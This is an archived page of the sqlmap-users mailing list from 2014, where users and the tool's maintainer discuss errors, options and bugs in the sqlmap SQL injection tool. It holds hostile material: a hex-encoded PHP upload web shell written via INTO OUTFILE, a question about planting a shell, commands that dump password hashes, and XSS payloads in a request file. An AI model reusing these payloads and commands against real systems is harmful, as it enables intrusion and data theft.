sqlmap-users Mailing List for sqlmap (Page 23)
Brought to you by:
inquisb
Menu
▾
▴
sqlmap-users — sqlmap users mailing list
You can subscribe to this list here.
| 2008 |
Jan
|
Feb
|
Mar
|
Apr
|
May
|
Jun
|
Jul
|
Aug
|
Sep
(4) |
Oct
(11) |
Nov
(24) |
Dec
(13) |
|---|---|---|---|---|---|---|---|---|---|---|---|---|
| 2009 |
Jan
(23) |
Feb
(17) |
Mar
(13) |
Apr
(48) |
May
(22) |
Jun
(18) |
Jul
(22) |
Aug
(13) |
Sep
(23) |
Oct
(6) |
Nov
(11) |
Dec
(25) |
| 2010 |
Jan
(21) |
Feb
(33) |
Mar
(61) |
Apr
(47) |
May
(48) |
Jun
(30) |
Jul
(24) |
Aug
(37) |
Sep
(52) |
Oct
(59) |
Nov
(32) |
Dec
(57) |
| 2011 |
Jan
(166) |
Feb
(93) |
Mar
(65) |
Apr
(117) |
May
(87) |
Jun
(124) |
Jul
(102) |
Aug
(78) |
Sep
(65) |
Oct
(22) |
Nov
(71) |
Dec
(79) |
| 2012 |
Jan
(93) |
Feb
(55) |
Mar
(45) |
Apr
(49) |
May
(56) |
Jun
(93) |
Jul
(95) |
Aug
(42) |
Sep
(26) |
Oct
(36) |
Nov
(32) |
Dec
(46) |
| 2013 |
Jan
(36) |
Feb
(78) |
Mar
(38) |
Apr
(57) |
May
(35) |
Jun
(39) |
Jul
(23) |
Aug
(33) |
Sep
(28) |
Oct
(38) |
Nov
(22) |
Dec
(16) |
| 2014 |
Jan
(33) |
Feb
(23) |
Mar
(41) |
Apr
(29) |
May
(12) |
Jun
(20) |
Jul
(21) |
Aug
(23) |
Sep
(18) |
Oct
(34) |
Nov
(12) |
Dec
(39) |
| 2015 |
Jan
(2) |
Feb
(51) |
Mar
(10) |
Apr
(28) |
May
(9) |
Jun
(22) |
Jul
(32) |
Aug
(35) |
Sep
(29) |
Oct
(50) |
Nov
(8) |
Dec
(2) |
| 2016 |
Jan
(8) |
Feb
(2) |
Mar
(3) |
Apr
(14) |
May
|
Jun
|
Jul
|
Aug
(12) |
Sep
|
Oct
|
Nov
(1) |
Dec
(19) |
| 2017 |
Jan
|
Feb
(18) |
Mar
|
Apr
(1) |
May
|
Jun
|
Jul
|
Aug
(4) |
Sep
|
Oct
|
Nov
(2) |
Dec
|
| 2018 |
Jan
|
Feb
|
Mar
(1) |
Apr
(1) |
May
(3) |
Jun
|
Jul
|
Aug
|
Sep
|
Oct
|
Nov
|
Dec
|
| 2019 |
Jan
|
Feb
|
Mar
|
Apr
(3) |
May
|
Jun
|
Jul
|
Aug
|
Sep
|
Oct
|
Nov
|
Dec
|
|
From: Miroslav S. <mir...@gm...> - 2014-04-29 15:25:40
|
As the error suggests, no sufficient privileges. Common mitigation. Bye On Apr 29, 2014 11:19 AM, "Sabin Ranjit" <thi...@gm...> wrote: > hi, > I have sql injection, i can get the current user with the --current-user > command but when i option for password then sqlmap couldnt do it. it says: > > [WARNING] in case of continuous data retrieval problems you are advised to > try a switch '--no-cast' or switch '--hex' > [05:13:51] [WARNING] unable to retrieve the number of password hashes for > user 'busroute' > [05:13:51] [ERROR] unable to retrieve the password hashes for the database > users (most probably because the session user has no read privileges over > the relevant system database table) > [05:13:51] [WARNING] HTTP error codes detected during run: > 500 (Internal Server Error) - 3 times > > Is this the usual way to mitigate the sqli risk. or this is the sqlmap > error that needs to be option in. > the used following command: > #sqlmap -u http://example.com/br/create?key=1 --dbms="MySQL" --risk=3 > level=3 -p key --current-user --password --technique=B > > thanks > > kind regards, > > |
|
From: Travis A. <tra...@gm...> - 2014-04-29 13:32:40
|
I'm using the conf file to kick everything off. The only thing modified in the conf is the URL and the data sent in the post request. ============================== Conf file ================================ # Target URL. # Example: http://192.168.1.121/sqlmap/mysql/get_int.php?id=1&cat=2 url = http://blah/login # Parse targets from Burp or WebScarab logs # Valid: Burp proxy (http://portswigger.net/suite/) requests log file path # or WebScarab proxy ( http://www.owasp.org/index.php/Category:OWASP_WebScarab_Project) # 'conversations/' folder path logFile = # Scan multiple targets enlisted in a given textual file bulkFile = # Load HTTP request from a file # Example (file content): POST /login.jsp HTTP/1.1\nHost: example.com\nUser-Agent: Mozilla/4.0\n\nuserid=joe&password=guessme requestFile = # Rather than providing a target URL, let Google return target # hosts as result of your Google dork expression. For a list of Google # dorks see Johnny Long Google Hacking Database at # http://johnny.ihackstuff.com/ghdb.php. # Example: +ext:php +inurl:"&id=" +intext:"powered by " googleDork = # These options can be used to specify how to connect to the target URL. [Request] # Data string to be sent through POST. data = <?xml version="1.0" encoding="UTF-8"?><ns7:LoginInput sessionDiscriminator="blah" locale="en_US" role="" group="" password="monkey" username="monkey" xmlns:ns6=" http://blah.com/Schemas/Core/2008-03/Session" xmlns:ns2=" http://blah.com/Schemas/Soa/2006-03/Base" xmlns:ns5=" http://blah.com/Schemas/Core/2007-12/Session" xmlns=" http://blah.com/Schemas/Core/2006-03/Session" xmlns:ns8=" http://blah.com/Schemas/Core/2009-04/Session" xmlns:ns3=" http://blah.com/Schemas/Core/2007-01/Session" xmlns:ns7=" http://blah.com/Schemas/Core/2008-06/Session" xmlns:ns4=" http://blah.com/Schemas/Core/2007-06/Session" xmlns:ns10=" http://blah.com/Schemas/Core/2012-02/Session" xmlns:ns9=" http://blah.com/Schemas/Core/2010-04/Session"/> # Character used for splitting parameter values paramDel = ================================== Command line output =================================== [C:\tools\sqlmap-bd16bb7]python sqlmap.py -c sqlmap.conf sqlmap/1.0-dev - automatic SQL injection and database takeover tool http://sqlmap.org [!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program [*] starting at 23:12:39 [23:12:39] [WARNING] using 'C:\Users\travis\.sqlmap\output' as the output directory [23:12:39] [INFO] testing connection to the target URL [23:12:39] [INFO] heuristics detected web page charset 'ascii' [23:12:39] [CRITICAL] not authorized, try to provide right HTTP authentication type and valid credentials (401) [23:12:39] [CRITICAL] not authorized, try to provide right HTTP authentication type and valid credentials (401) [23:12:39] [WARNING] HTTP error codes detected during run: 401 (Unauthorized) - 1 times [*] shutting down at 23:12:39 [C:\tools\sqlmap-bd16bb7] ================================= End =========================================== Let me know if anymore information is needed. Thanks for all the help. On Tue, Apr 29, 2014 at 1:51 AM, Miroslav Stampar < mir...@gm...> wrote: > Can you please send sqlmap console log and used parameters? > On Apr 28, 2014 10:42 PM, "Travis Altman" <tra...@gm...> wrote: > >> Wants me to provide the right http authentication type but the >> credentials are in the body of the post request. I'm intentionally >> providing bad credentials which does result in a "401 Unauthorized", not >> sure if sqlmap is triggering off of that. Also the body of the request is >> XML if that makes any difference. Any idea why this might be happening? >> >> >> ------------------------------------------------------------------------------ >> "Accelerate Dev Cycles with Automated Cross-Browser Testing - For FREE >> Instantly run your Selenium tests across 300+ browser/OS combos. Get >> unparalleled scalability from the best Selenium testing platform >> available. >> Simple to use. Nothing to install. Get started now for free." >> http://p.sf.net/sfu/SauceLabs >> _______________________________________________ >> sqlmap-users mailing list >> sql...@li... >> https://lists.sourceforge.net/lists/listinfo/sqlmap-users >> >> |
|
From: Sabin R. <thi...@gm...> - 2014-04-29 10:07:07
|
hi, im getting the error like this when i try to upload a hex in the sql-shell: [WARNING] execution of custom SQL queries is only available when stacked queries are supported my command is like this: sql-shell> select 0x3c666f726d20656e63747970653d226d756c7469706172742f666f726d2d646174612220616374696f6e3d2275706c6f61642e70687022206d6574686f643d22504f5354223e3c696e707574206e616d653d2275706c6f6164656466696c652220747970653d2266696c65222f3e3c696e70757420747970653d227375626d6974222076616c75653d2255706c6f61642046696c65222f3e3c2f666f726d3e0d0a3c3f70687020247461726765745f706174683d626173656e616d6528245f46494c45535b2775706c6f6164656466696c65275d5b276e616d65275d293b6966286d6f76655f75706c6f616465645f66696c6528245f46494c45535b2775706c6f6164656466696c65275d5b27746d705f6e616d65275d2c247461726765745f7061746829297b6563686f20626173656e616d6528245f46494c45535b2775706c6f6164656466696c65275d5b276e616d65275d292e2220686173206265656e2075706c6f61646564223b7d656c73657b6563686f20224572726f7221223b7d3f3e into "/home/public_html/upload.php"; what is issue? please help. thanks, regards |
|
From: Sabin R. <thi...@gm...> - 2014-04-29 09:19:25
|
hi, I have sql injection, i can get the current user with the --current-user command but when i option for password then sqlmap couldnt do it. it says: [WARNING] in case of continuous data retrieval problems you are advised to try a switch '--no-cast' or switch '--hex' [05:13:51] [WARNING] unable to retrieve the number of password hashes for user 'busroute' [05:13:51] [ERROR] unable to retrieve the password hashes for the database users (most probably because the session user has no read privileges over the relevant system database table) [05:13:51] [WARNING] HTTP error codes detected during run: 500 (Internal Server Error) - 3 times Is this the usual way to mitigate the sqli risk. or this is the sqlmap error that needs to be option in. the used following command: #sqlmap -u http://example.com/br/create?key=1 --dbms="MySQL" --risk=3 level=3 -p key --current-user --password --technique=B thanks kind regards, |
|
From: Miroslav S. <mir...@gm...> - 2014-04-29 05:51:17
|
Can you please send sqlmap console log and used parameters? On Apr 28, 2014 10:42 PM, "Travis Altman" <tra...@gm...> wrote: > Wants me to provide the right http authentication type but the credentials > are in the body of the post request. I'm intentionally providing bad > credentials which does result in a "401 Unauthorized", not sure if sqlmap > is triggering off of that. Also the body of the request is XML if that > makes any difference. Any idea why this might be happening? > > > ------------------------------------------------------------------------------ > "Accelerate Dev Cycles with Automated Cross-Browser Testing - For FREE > Instantly run your Selenium tests across 300+ browser/OS combos. Get > unparalleled scalability from the best Selenium testing platform available. > Simple to use. Nothing to install. Get started now for free." > http://p.sf.net/sfu/SauceLabs > _______________________________________________ > sqlmap-users mailing list > sql...@li... > https://lists.sourceforge.net/lists/listinfo/sqlmap-users > > |
|
From: Travis A. <tra...@gm...> - 2014-04-28 20:42:07
|
Wants me to provide the right http authentication type but the credentials are in the body of the post request. I'm intentionally providing bad credentials which does result in a "401 Unauthorized", not sure if sqlmap is triggering off of that. Also the body of the request is XML if that makes any difference. Any idea why this might be happening? |
|
From: Doritos <dor...@ya...> - 2014-04-25 18:54:08
|
./sqlmap.py --version sqlmap/1.0-dev-b54651b [*] shutting down at 15:49:18 I just tested again. My bad. I was using with --threads=10 If I remove the --threads it works fine. Even with --threads if I use --delay, during the tests it respects the delay. But to my understading --threads and --delay are opposite ideas. They should not be used together. On 25-04-2014 11:24, Miroslav Stampar wrote: > Hi. > > Just tried and it works with the latest revision. Can you please tell me > which version/revision do you use? > > Kind regards, > Miroslav Stampar > > > On Thu, Apr 24, 2014 at 4:01 PM, Doritos > <dor...@ya... > <mailto:dor...@ya...>> wrote: > > Suggestion: --crawl option to respect the --delay parameter. > > The issue right now is: If I use the crawl option to crawl some site, > sometimes it crawls too fast. > > I expected the --delay option to slow down the crawling, but the --delay > option only applies to the injection test. > > > Thanks. > > > ------------------------------------------------------------------------------ > Start Your Social Network Today - Download eXo Platform > Build your Enterprise Intranet with eXo Platform Software > Java Based Open Source Intranet - Social, Extensible, Cloud Ready > Get Started Now And Turn Your Intranet Into A Collaboration Platform > http://p.sf.net/sfu/ExoPlatform > _______________________________________________ > sqlmap-users mailing list > sql...@li... > <mailto:sql...@li...> > https://lists.sourceforge.net/lists/listinfo/sqlmap-users > > > > > -- > Miroslav Stampar > http://about.me/stamparm > > > ------------------------------------------------------------------------------ > Start Your Social Network Today - Download eXo Platform > Build your Enterprise Intranet with eXo Platform Software > Java Based Open Source Intranet - Social, Extensible, Cloud Ready > Get Started Now And Turn Your Intranet Into A Collaboration Platform > http://p.sf.net/sfu/ExoPlatform > > > > _______________________________________________ > sqlmap-users mailing list > sql...@li... > https://lists.sourceforge.net/lists/listinfo/sqlmap-users > |
|
From: Miroslav S. <mir...@gm...> - 2014-04-25 14:24:32
|
Hi. Just tried and it works with the latest revision. Can you please tell me which version/revision do you use? Kind regards, Miroslav Stampar On Thu, Apr 24, 2014 at 4:01 PM, Doritos <dor...@ya...> wrote: > Suggestion: --crawl option to respect the --delay parameter. > > The issue right now is: If I use the crawl option to crawl some site, > sometimes it crawls too fast. > > I expected the --delay option to slow down the crawling, but the --delay > option only applies to the injection test. > > > Thanks. > > > > ------------------------------------------------------------------------------ > Start Your Social Network Today - Download eXo Platform > Build your Enterprise Intranet with eXo Platform Software > Java Based Open Source Intranet - Social, Extensible, Cloud Ready > Get Started Now And Turn Your Intranet Into A Collaboration Platform > http://p.sf.net/sfu/ExoPlatform > _______________________________________________ > sqlmap-users mailing list > sql...@li... > https://lists.sourceforge.net/lists/listinfo/sqlmap-users > -- Miroslav Stampar http://about.me/stamparm |
|
From: Doritos <dor...@ya...> - 2014-04-24 14:02:35
|
Suggestion: --crawl option to respect the --delay parameter. The issue right now is: If I use the crawl option to crawl some site, sometimes it crawls too fast. I expected the --delay option to slow down the crawling, but the --delay option only applies to the injection test. Thanks. |
|
From: Miroslav S. <mir...@gm...> - 2014-04-21 19:32:53
|
Hi. In majority of cases user can't do anything. It's an usual way how to mitigate this kind of vulnerabilites (by using low privileged DBMS accounts). Kind regards, Miroslav Stampar On Mon, Apr 21, 2014 at 4:35 PM, MR Mokhtar <ger...@gm...> wrote: > Hi > i have sql injection and i can dump all tables and every thing is ok but > when i try to upload a shell it couldn't !! > sqlmap says cannot write files dude to permissions > now is there any thing i can do to write files to the server? > thanks in advance. > > > > ------------------------------------------------------------------------------ > Start Your Social Network Today - Download eXo Platform > Build your Enterprise Intranet with eXo Platform Software > Java Based Open Source Intranet - Social, Extensible, Cloud Ready > Get Started Now And Turn Your Intranet Into A Collaboration Platform > http://p.sf.net/sfu/ExoPlatform > _______________________________________________ > sqlmap-users mailing list > sql...@li... > https://lists.sourceforge.net/lists/listinfo/sqlmap-users > > -- Miroslav Stampar http://about.me/stamparm |
|
From: MR M. <ger...@gm...> - 2014-04-21 14:36:02
|
Hi i have sql injection and i can dump all tables and every thing is ok but when i try to upload a shell it couldn't !! sqlmap says cannot write files dude to permissions now is there any thing i can do to write files to the server? thanks in advance. |
|
From: Brandon P. <bpe...@gm...> - 2014-04-15 12:20:29
|
Np, I will dig around see what I can find. Thanks! On Tue, Apr 15, 2014 at 6:23 AM, Miroslav Stampar < mir...@gm...> wrote: > Hi. > > This is an old opened Issue (Feature request) [1]. This moment can't > promise you anything than that I'll have it on my mind ;) > > Kind regards, > Miroslav Stampar > > [1] https://github.com/sqlmapproject/sqlmap/issues/431 > > > On Tue, Apr 15, 2014 at 2:53 AM, Brandon Perry <bpe...@gm...>wrote: > >> Looking in lib/core/option.py it seems to parsing the correct header fwiw. >> >> >> On Mon, Apr 14, 2014 at 7:44 PM, Brandon Perry <bpe...@gm... >> > wrote: >> >>> Hey! >>> >>> I have a PUT request in a file, passing it to sqlmap with -r, but sqlmap >>> is POSTing the data, and that verb isn't allowed. :( Currently on latest. I >>> confirmed this by proxying through burp suite and seeing it was a POST. >>> >>> Would it help if I provided the request I am making? >>> >>> -- >>> http://volatile-minds.blogspot.com -- blog >>> http://www.volatileminds.net -- website >>> >> >> >> >> -- >> http://volatile-minds.blogspot.com -- blog >> http://www.volatileminds.net -- website >> >> >> ------------------------------------------------------------------------------ >> Learn Graph Databases - Download FREE O'Reilly Book >> "Graph Databases" is the definitive new guide to graph databases and their >> applications. Written by three acclaimed leaders in the field, >> this first edition is now available. Download your free book today! >> http://p.sf.net/sfu/NeoTech >> _______________________________________________ >> sqlmap-users mailing list >> sql...@li... >> https://lists.sourceforge.net/lists/listinfo/sqlmap-users >> >> > > > -- > Miroslav Stampar > http://about.me/stamparm > -- http://volatile-minds.blogspot.com -- blog http://www.volatileminds.net -- website |
|
From: Miroslav S. <mir...@gm...> - 2014-04-15 11:24:06
|
Hi. This is an old opened Issue (Feature request) [1]. This moment can't promise you anything than that I'll have it on my mind ;) Kind regards, Miroslav Stampar [1] https://github.com/sqlmapproject/sqlmap/issues/431 On Tue, Apr 15, 2014 at 2:53 AM, Brandon Perry <bpe...@gm...>wrote: > Looking in lib/core/option.py it seems to parsing the correct header fwiw. > > > On Mon, Apr 14, 2014 at 7:44 PM, Brandon Perry <bpe...@gm...>wrote: > >> Hey! >> >> I have a PUT request in a file, passing it to sqlmap with -r, but sqlmap >> is POSTing the data, and that verb isn't allowed. :( Currently on latest. I >> confirmed this by proxying through burp suite and seeing it was a POST. >> >> Would it help if I provided the request I am making? >> >> -- >> http://volatile-minds.blogspot.com -- blog >> http://www.volatileminds.net -- website >> > > > > -- > http://volatile-minds.blogspot.com -- blog > http://www.volatileminds.net -- website > > > ------------------------------------------------------------------------------ > Learn Graph Databases - Download FREE O'Reilly Book > "Graph Databases" is the definitive new guide to graph databases and their > applications. Written by three acclaimed leaders in the field, > this first edition is now available. Download your free book today! > http://p.sf.net/sfu/NeoTech > _______________________________________________ > sqlmap-users mailing list > sql...@li... > https://lists.sourceforge.net/lists/listinfo/sqlmap-users > > -- Miroslav Stampar http://about.me/stamparm |
|
From: Brandon P. <bpe...@gm...> - 2014-04-15 00:53:30
|
Looking in lib/core/option.py it seems to parsing the correct header fwiw. On Mon, Apr 14, 2014 at 7:44 PM, Brandon Perry <bpe...@gm...>wrote: > Hey! > > I have a PUT request in a file, passing it to sqlmap with -r, but sqlmap > is POSTing the data, and that verb isn't allowed. :( Currently on latest. I > confirmed this by proxying through burp suite and seeing it was a POST. > > Would it help if I provided the request I am making? > > -- > http://volatile-minds.blogspot.com -- blog > http://www.volatileminds.net -- website > -- http://volatile-minds.blogspot.com -- blog http://www.volatileminds.net -- website |
|
From: Brandon P. <bpe...@gm...> - 2014-04-15 00:44:43
|
Hey! I have a PUT request in a file, passing it to sqlmap with -r, but sqlmap is POSTing the data, and that verb isn't allowed. :( Currently on latest. I confirmed this by proxying through burp suite and seeing it was a POST. Would it help if I provided the request I am making? -- http://volatile-minds.blogspot.com -- blog http://www.volatileminds.net -- website |
|
From: Sabin R. <thi...@gm...> - 2014-04-08 15:12:09
|
hi Miroslav, the work around from Brandon did work. I faced this in the latest kali 1.06 and also in the case of window 8. thanks for your reply. :) regards, sabin On Mon, Apr 7, 2014 at 11:28 PM, Miroslav Stampar < mir...@gm...> wrote: > Hi. > > This seems to be a known issue in Kali's (and similar) pre-installed > sqlmap package. > > If this work around from Brandon doesn't work out for you please copy the > request.txt to the /tmp directory and checkout/run the latest revision like > described here: > > 1) cd /tmp > 2) git clone https://github.com/sqlmapproject/sqlmap.git > 3) cd sqlmap > 4) python sqlmap.py -r request.txt > > Kind regards, > Miroslav Stampar > > > On Mon, Apr 7, 2014 at 3:48 PM, Brandon Perry <bpe...@gm...>wrote: > >> Specify an absolute path to the request file. >> >> >> On Mon, Apr 7, 2014 at 3:34 AM, Sabin Ranjit <thi...@gm...>wrote: >> >>> hello all, >>> im getting this error while running the sqlmap with following request >>> file. the error displays "parsing HTTP request from >>> 'payment_form_submit.txt' >>> [04:22:54] [CRITICAL] the specified HTTP request file does not exist. " >>> >>> I have used following syntax to run it >>> #sqlmap -r 'payment_form_submit.txt' --dbms="MySQL" --level=3 --risk=4 >>> -p cardNumber >>> >>> i have attached the request file here with changed hostname. Thank you. >>> >>> regards, >>> sabin >>> >>> >>> >>> >>> ------------------------------------------------------------------------------ >>> Put Bad Developers to Shame >>> Dominate Development with Jenkins Continuous Integration >>> Continuously Automate Build, Test & Deployment >>> Start a new project now. Try Jenkins in the cloud. >>> http://p.sf.net/sfu/13600_Cloudbees_APR >>> _______________________________________________ >>> sqlmap-users mailing list >>> sql...@li... >>> https://lists.sourceforge.net/lists/listinfo/sqlmap-users >>> >>> >> >> >> -- >> http://volatile-minds.blogspot.com -- blog >> http://www.volatileminds.net -- website >> >> >> ------------------------------------------------------------------------------ >> Put Bad Developers to Shame >> Dominate Development with Jenkins Continuous Integration >> Continuously Automate Build, Test & Deployment >> Start a new project now. Try Jenkins in the cloud. >> http://p.sf.net/sfu/13600_Cloudbees_APR >> _______________________________________________ >> sqlmap-users mailing list >> sql...@li... >> https://lists.sourceforge.net/lists/listinfo/sqlmap-users >> >> > > > -- > Miroslav Stampar > http://about.me/stamparm > |
|
From: Miroslav S. <mir...@gm...> - 2014-04-07 17:43:27
|
Hi. This seems to be a known issue in Kali's (and similar) pre-installed sqlmap package. If this work around from Brandon doesn't work out for you please copy the request.txt to the /tmp directory and checkout/run the latest revision like described here: 1) cd /tmp 2) git clone https://github.com/sqlmapproject/sqlmap.git 3) cd sqlmap 4) python sqlmap.py -r request.txt Kind regards, Miroslav Stampar On Mon, Apr 7, 2014 at 3:48 PM, Brandon Perry <bpe...@gm...>wrote: > Specify an absolute path to the request file. > > > On Mon, Apr 7, 2014 at 3:34 AM, Sabin Ranjit <thi...@gm...>wrote: > >> hello all, >> im getting this error while running the sqlmap with following request >> file. the error displays "parsing HTTP request from >> 'payment_form_submit.txt' >> [04:22:54] [CRITICAL] the specified HTTP request file does not exist. " >> >> I have used following syntax to run it >> #sqlmap -r 'payment_form_submit.txt' --dbms="MySQL" --level=3 --risk=4 -p >> cardNumber >> >> i have attached the request file here with changed hostname. Thank you. >> >> regards, >> sabin >> >> >> >> >> ------------------------------------------------------------------------------ >> Put Bad Developers to Shame >> Dominate Development with Jenkins Continuous Integration >> Continuously Automate Build, Test & Deployment >> Start a new project now. Try Jenkins in the cloud. >> http://p.sf.net/sfu/13600_Cloudbees_APR >> _______________________________________________ >> sqlmap-users mailing list >> sql...@li... >> https://lists.sourceforge.net/lists/listinfo/sqlmap-users >> >> > > > -- > http://volatile-minds.blogspot.com -- blog > http://www.volatileminds.net -- website > > > ------------------------------------------------------------------------------ > Put Bad Developers to Shame > Dominate Development with Jenkins Continuous Integration > Continuously Automate Build, Test & Deployment > Start a new project now. Try Jenkins in the cloud. > http://p.sf.net/sfu/13600_Cloudbees_APR > _______________________________________________ > sqlmap-users mailing list > sql...@li... > https://lists.sourceforge.net/lists/listinfo/sqlmap-users > > -- Miroslav Stampar http://about.me/stamparm |
|
From: Brandon P. <bpe...@gm...> - 2014-04-07 13:48:20
|
Specify an absolute path to the request file. On Mon, Apr 7, 2014 at 3:34 AM, Sabin Ranjit <thi...@gm...> wrote: > hello all, > im getting this error while running the sqlmap with following request > file. the error displays "parsing HTTP request from > 'payment_form_submit.txt' > [04:22:54] [CRITICAL] the specified HTTP request file does not exist. " > > I have used following syntax to run it > #sqlmap -r 'payment_form_submit.txt' --dbms="MySQL" --level=3 --risk=4 -p > cardNumber > > i have attached the request file here with changed hostname. Thank you. > > regards, > sabin > > > > > ------------------------------------------------------------------------------ > Put Bad Developers to Shame > Dominate Development with Jenkins Continuous Integration > Continuously Automate Build, Test & Deployment > Start a new project now. Try Jenkins in the cloud. > http://p.sf.net/sfu/13600_Cloudbees_APR > _______________________________________________ > sqlmap-users mailing list > sql...@li... > https://lists.sourceforge.net/lists/listinfo/sqlmap-users > > -- http://volatile-minds.blogspot.com -- blog http://www.volatileminds.net -- website |
|
From: Sabin R. <thi...@gm...> - 2014-04-07 08:34:55
|
POST /adyen/payment HTTP/1.1 Host: qa.xx.xxx.com User-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; rv:28.0) Gecko/20100101 Firefox/28.0 Accept: application/json, text/javascript, */*; q=0.01 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Content-Type: application/x-www-form-urlencoded; charset=UTF-8 X-Requested-With: XMLHttpRequest Referer: https://qa.xx.xxx.com/site Content-Length: 287 Cookie: YII_CSRF_TOKEN=40f85a2013fae241b220b696edaaadc1955bb519; PHPSESSID=36m2jph1mdnd49rg7btp7q7uc4; buyer_info=2006 Connection: keep-alive Pragma: no-cache Cache-Control: no-cache YII_CSRF_TOKEN=§40f85a2013fae241b220b696edaaadc1955bb519§&cardNumber=§%22%3E%3Cscript%3Ealert(%22street+number%22)%3B%3C%2Fsctript%3E%3C%22§&exp_year=§2016§&exp_month=§06§&cvc=§737§&cardHolder=§%22%3E%3Cscript%3Ealert(%22name%22)%3B%3C%2Fsctript%3E%3C%22§&email=§dhan%40ogy.com§&amount=§80§ |
|
From: Miroslav S. <mir...@gm...> - 2014-04-04 14:18:38
|
Hi. Thank you for your report. It should be fixed now. Bye On Fri, Apr 4, 2014 at 11:19 AM, Visual Zhang <nt...@gm...> wrote: > [17:12:55] [CRITICAL] unhandled exception in sqlmap/1.0-dev, retry > your run with the latest development version from the GitHub > repository. If the exception persists, please send by e-mail to > 'sql...@li...' or open a new issue at > 'https://github.com/sqlmapproject/sqlmap/issues/new' with the > following text and any information required to reproduce the bug. The > developers will try to reproduce the bug, fix it accordingly and get > back to you. > sqlmap version: 1.0-dev > Python version: 2.7.6 > Operating system: posix > Command line: ./sqlmap.py -r szqcz.txt -p utype > Technique: None > Back-end DBMS: None (identified) > Traceback (most recent call last): > File "./sqlmap.py", line 95, in main > start() > File "/Users/anon/tools/sqlmap/lib/controller/controller.py", line > 382, in start > checkStability() > File "/Users/anon/tools/sqlmap/lib/controller/checks.py", line 918, > in checkStability > secondPage, _ = Request.queryPage(content=True, raise404=False) > File "/Users/anon/tools/sqlmap/lib/request/connect.py", line 891, in > queryPage > page, headers, code = Connect.getPage(url=uri, get=get, post=post, > cookie=cookie, ua=ua, referer=referer, host=host, silent=silent, > method=method, auxHeaders=auxHeaders, response=response, > raise404=raise404, ignoreTimeout=timeBasedCompare) > File "/Users/anon/tools/sqlmap/lib/request/connect.py", line 317, in > getPage > headers = forgeHeaders({HTTP_HEADER.COOKIE: cookie, > HTTP_HEADER.USER_AGENT: ua, HTTP_HEADER.REFERER: referer}) > File "/Users/anon/tools/sqlmap/lib/request/basic.py", line 106, in > forgeHeaders > headers[HTTP_HEADER.COOKIE] += "%s %s=%s" % (conf.cDel or > DEFAULT_COOKIE_DELIMITER, cookie.name, cookie.value) > UnicodeDecodeError: 'ascii' codec can't decode byte 0xf7 in position > 16: ordinal not in range(128) > > content of the txt file > > POST /login.do HTTP/1.1 > Content-Length: 164 > Content-Type: application/x-www-form-urlencoded > Referer: http://szqcz.com:80/ > Cookie: JSESSIONID=6966495B026B8E5F865046C2EA694895 > Host: szqcz.com > Connection: Keep-alive > Accept-Encoding: gzip,deflate > User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 > (KHTML, like Gecko) Chrome/28.0.1500.63 Safari/537.36 > Accept: */* > > > err_flag=&event=login&password=g00dPa%24%24w0rD&password1=65&rememberMe=yes&returnurl=&user_code=%e4%bc%9a%e5%91%98%e5%90%8d/%e6%89%8b%e6%9c%ba%e5%8f%b7&utype=1 > > > ------------------------------------------------------------------------------ > _______________________________________________ > sqlmap-users mailing list > sql...@li... > https://lists.sourceforge.net/lists/listinfo/sqlmap-users > -- Miroslav Stampar http://about.me/stamparm |
|
From: Visual Z. <nt...@gm...> - 2014-04-04 09:20:27
|
[17:12:55] [CRITICAL] unhandled exception in sqlmap/1.0-dev, retry your run with the latest development version from the GitHub repository. If the exception persists, please send by e-mail to 'sql...@li...' or open a new issue at 'https://github.com/sqlmapproject/sqlmap/issues/new' with the following text and any information required to reproduce the bug. The developers will try to reproduce the bug, fix it accordingly and get back to you. sqlmap version: 1.0-dev Python version: 2.7.6 Operating system: posix Command line: ./sqlmap.py -r szqcz.txt -p utype Technique: None Back-end DBMS: None (identified) Traceback (most recent call last): File "./sqlmap.py", line 95, in main start() File "/Users/anon/tools/sqlmap/lib/controller/controller.py", line 382, in start checkStability() File "/Users/anon/tools/sqlmap/lib/controller/checks.py", line 918, in checkStability secondPage, _ = Request.queryPage(content=True, raise404=False) File "/Users/anon/tools/sqlmap/lib/request/connect.py", line 891, in queryPage page, headers, code = Connect.getPage(url=uri, get=get, post=post, cookie=cookie, ua=ua, referer=referer, host=host, silent=silent, method=method, auxHeaders=auxHeaders, response=response, raise404=raise404, ignoreTimeout=timeBasedCompare) File "/Users/anon/tools/sqlmap/lib/request/connect.py", line 317, in getPage headers = forgeHeaders({HTTP_HEADER.COOKIE: cookie, HTTP_HEADER.USER_AGENT: ua, HTTP_HEADER.REFERER: referer}) File "/Users/anon/tools/sqlmap/lib/request/basic.py", line 106, in forgeHeaders headers[HTTP_HEADER.COOKIE] += "%s %s=%s" % (conf.cDel or DEFAULT_COOKIE_DELIMITER, cookie.name, cookie.value) UnicodeDecodeError: 'ascii' codec can't decode byte 0xf7 in position 16: ordinal not in range(128) content of the txt file POST /login.do HTTP/1.1 Content-Length: 164 Content-Type: application/x-www-form-urlencoded Referer: http://szqcz.com:80/ Cookie: JSESSIONID=6966495B026B8E5F865046C2EA694895 Host: szqcz.com Connection: Keep-alive Accept-Encoding: gzip,deflate User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/28.0.1500.63 Safari/537.36 Accept: */* err_flag=&event=login&password=g00dPa%24%24w0rD&password1=65&rememberMe=yes&returnurl=&user_code=%e4%bc%9a%e5%91%98%e5%90%8d/%e6%89%8b%e6%9c%ba%e5%8f%b7&utype=1 |
|
From: Brandon P. <bpe...@gm...> - 2014-03-30 14:26:36
|
